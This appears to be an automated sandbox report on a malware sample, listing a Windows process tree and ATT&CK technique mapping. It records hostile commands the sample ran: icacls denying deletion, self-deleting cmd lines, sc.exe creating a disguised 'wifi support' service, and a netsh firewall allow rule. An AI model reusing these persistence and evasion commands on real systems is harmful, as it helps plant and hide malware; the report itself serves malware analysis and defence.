C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4328
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4892
-
C:\Users\Admin\AppData\Local\Temp\8132.exeC:\Users\Admin\AppData\Local\Temp\8132.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4984 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\b1facd0d-4dd5-495c-8d07-6e6f4f4b88c6" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\8132.exe"C:\Users\Admin\AppData\Local\Temp\8132.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
PID:396 -
C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin1.exe"C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin1.exe"3⤵
- Executes dropped EXE
PID:4816
-
-
C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin2.exe"C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin2.exe"3⤵
- Executes dropped EXE
PID:5016
-
-
C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin.exe"C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin.exe"3⤵
- Executes dropped EXE
PID:5036 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin.exe4⤵PID:5040
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
PID:5184
-
-
-
-
C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\5.exe"C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\5.exe"3⤵PID:5052
-
-
-
C:\Users\Admin\AppData\Local\Temp\83A4.exeC:\Users\Admin\AppData\Local\Temp\83A4.exe1⤵
- Executes dropped EXE
PID:5004 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 83A4.exe /f & erase C:\Users\Admin\AppData\Local\Temp\83A4.exe & exit2⤵PID:5316
-
-
C:\Users\Admin\AppData\Local\Temp\8887.exeC:\Users\Admin\AppData\Local\Temp\8887.exe1⤵
- Executes dropped EXE
PID:5088
-
C:\Users\Admin\AppData\Local\Temp\90E5.exeC:\Users\Admin\AppData\Local\Temp\90E5.exe1⤵
- Executes dropped EXE
PID:2128
-
C:\Users\Admin\AppData\Local\Temp\955A.exeC:\Users\Admin\AppData\Local\Temp\955A.exe1⤵
- Executes dropped EXE
PID:4828 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ebpypiix\2⤵PID:5028
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rielcbfj.exe" C:\Windows\SysWOW64\ebpypiix\2⤵PID:732
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ebpypiix binPath= "C:\Windows\SysWOW64\ebpypiix\rielcbfj.exe /d\"C:\Users\Admin\AppData\Local\Temp\955A.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:2852
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ebpypiix "wifi internet conection"2⤵PID:1604
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ebpypiix2⤵PID:5012
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\9BE3.exeC:\Users\Admin\AppData\Local\Temp\9BE3.exe1⤵
- Executes dropped EXE
PID:2664
-
C:\Users\Admin\AppData\Local\Temp\A664.exeC:\Users\Admin\AppData\Local\Temp\A664.exe1⤵PID:5112
-
C:\Windows\SysWOW64\ebpypiix\rielcbfj.exeC:\Windows\SysWOW64\ebpypiix\rielcbfj.exe /d"C:\Users\Admin\AppData\Local\Temp\955A.exe"1⤵PID:3344
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:3432
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\B3C3.exeC:\Users\Admin\AppData\Local\Temp\B3C3.exe1⤵PID:1256
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5308
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
1Defense Evasion
File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
3Web Service
1